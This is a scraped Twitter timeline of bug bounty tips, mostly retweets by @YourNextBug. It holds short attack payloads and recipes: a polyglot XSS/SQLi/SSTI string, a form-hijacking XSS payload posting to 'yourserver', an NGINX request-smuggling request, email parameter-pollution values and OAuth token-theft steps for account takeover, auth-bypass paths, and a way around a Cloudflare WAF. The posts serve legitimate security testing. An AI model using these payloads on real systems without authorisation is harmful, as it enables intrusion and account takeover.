Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @YourNextBug
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @YourNextBug
-
Prikvačeni tweet
Google dork site:http://s3.amazonaws.com target this will help you find S3 buckets Razer S3 Bucket Hacked by
@snowoverride $$ 500 $$ Write Up https://github.com/ESME-Security/researchWriteup/blob/master/Razer/writeups/710319.md …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Your Next Bug Tip proslijedio/la je Tweet
#ffuf@ngkogkos@joohoi@Jhaddix Subdomain bruteforce with ffuf on 443 port. It works fine ffuf -u https://FUZZ.rootdomain.com -w jhaddixall.txt -v | grep "| URL | " | awk '{print $4}'Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Your Next Bug Tip proslijedio/la je Tweet
Takeover story of repo 1.A site having github logo 2. Example: Click on logo it'll show you git repo(http://github.com/site/ ) 3. In my case , It was 404 Main part 4. Created git account with name of company , So it was like http://github.com/site/ Successful takeover
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Your Next Bug Tip proslijedio/la je Tweet
Used X-Original-URL: /ADMIN
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Your Next Bug Tip proslijedio/la je Tweet
RCE story http://1.site.com/admin Forbidden 2.HTTP header in request - Login page access 3. Sqli queries tried no success 4. Some recon on gitlab - Found base64 pwd - decrypt 5. Accessed admin panel 6. Admin panel customized - CLI available 7. File read successful
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
BLH - Broken Link Hijacking Just suppose Ur site uses cool.c/Script.js After few year cool.c decided to close it services. Now story begins
buys cool.c and then host Script.js
BOoOM
This happened to Linkedin
READ BELOW
#bugbountytips#bugbountytip#bugbountyhttps://twitter.com/fatratfatrat/status/1222950920079626240 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Your Next Bug Tip proslijedio/la je Tweet
@albinowax sir I am facing a small confusion on HTTP Request Smuggling. Please help me with this https://hackerone.com/reports/498052 you were explaining that all normal HTTP clients, including web browsers, do follow redirects. The two stolen requests I showed above came from such clientsPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Your Next Bug Tip proslijedio/la je Tweet
I went COSMIC on the second week of 2020: Found a weirdly deep subdomain on
@censysio and looked at it. => Then found a JS file with different hardcoded endpoints => tried those endpoints => found another subdomain => asked for creds used admin:admin [1/n]Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Your Next Bug Tip proslijedio/la je Tweet
If anyone wants tons of Resources for
#bugbounty &#infosec or wants to Collab with others for#bughunting , and play#ctf can join my server here You can share your ideas and project and we can work together#bugbountytips#bugbountytoolshttps://discord.gg/gs77mJ5Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Your Next Bug Tip proslijedio/la je Tweet
To test XSS + SQLi + SSTI/CSTI with the same payload use : '"><svg/onload=prompt(5);>{{7*7}} ' ==> for Sql injection "><svg/onload=prompt(5);> ==> for XSS {{7*7}} ==> for SSTI/CSTI
#bugbounty#infosec#TogetherWeHitHarder#bugbountyprotip#Pentesting#bugbountytips by me !Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Your Next Bug Tip proslijedio/la je Tweet
Happy Friday hackers! Nitesh
@ideaengine007 found a critical RCE vulnerability in Jenkins that led us to discover a Bitcoin mining service running on a DoD website
. Head over to the disclosed report to see all the details! Thanks for being
Niteshhttps://hackerone.com/reports/768266 Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Haha, as excepted no one is sharing, Ok then Share the worst external bug bounty program, atleast it will save other's time.
#bugbounty#bugbountytip#BugBountyTipshttps://twitter.com/YourNextBug/status/1223285007248023552 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Your Next Bug Tip proslijedio/la je Tweet
Inject XSSHunter's payload in PortSwigger's hackability and send it to your target server to check for server side js execution. It will help you get screenshots in case if there is a blind SSRF :)
#bugbountytipsPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Any good external bug bounty program?
#bugbounty#bugbountytips#bugbountytipHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Steps 0) Login in with Twitter 1) Host Header Injection [to a.cxx] 2) Generate OAuth Token's Link 3) Send link to Victim, after victim authorize 4) Verifier send to a.cxx 5) Reuse use token Account Takeover by
@ngalongc#bugbountytips#bugbountytiphttps://hackerone.com/reports/317476Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Your Next Bug Tip proslijedio/la je Tweet
This report is also an example i.e sending an array of the email addresseshttps://hackerone.com/reports/322985
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Your Next Bug Tip proslijedio/la je Tweet
Got adviced by a friend email=victim@email.com&email=attacker@email.com email=victim@email.com,attacker@email.com email[0]=victim@email.com&email[1]=attacker@email.com
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Your Next Bug Tip proslijedio/la je Tweet
#bugbountytips#bugbounty NGINX error_page request smuggling Example Vulnerable Request GET /a HTTP/1.1 Host: localhost Content-Length: 56 GET /_hidden/index.html HTTP/1.1 Host: notlocalhost. Vulnerable Versions: 1.8.1 1.8.1 1.9.5 1.14.1 1.14.2 1.15.9 1.16.1 1.17.6Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Your Next Bug Tip proslijedio/la je Tweet
#bugbountytips#bugbounty Login Page Authentication bypass: Any file name / authorize account/connect/authorize home/authorize dashboard/authorize account/authorize/pic.twitter.com/Otm5sb8DS3
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Your Next Bug Tip proslijedio/la je Tweet
If you have a XSS in a <form> tag, close it and open a new form that you are controlling. Payload : "></form><form action="http://yourserver/> This is just a short payload for increasing the severity.
#bugbountytip#bugbountytipshttps://sametsahin.net/posts/steal-csrf-tokens-with-simple-xss/ …Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Your Next Bug Tip proslijedio/la je Tweet
Scanning a Cloudlfare WAF protected website.. impossible ? 1) Find real server ip (censys) 2) Use burp proxy regex to modify Host to original server address :D
#bugbountytipsHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.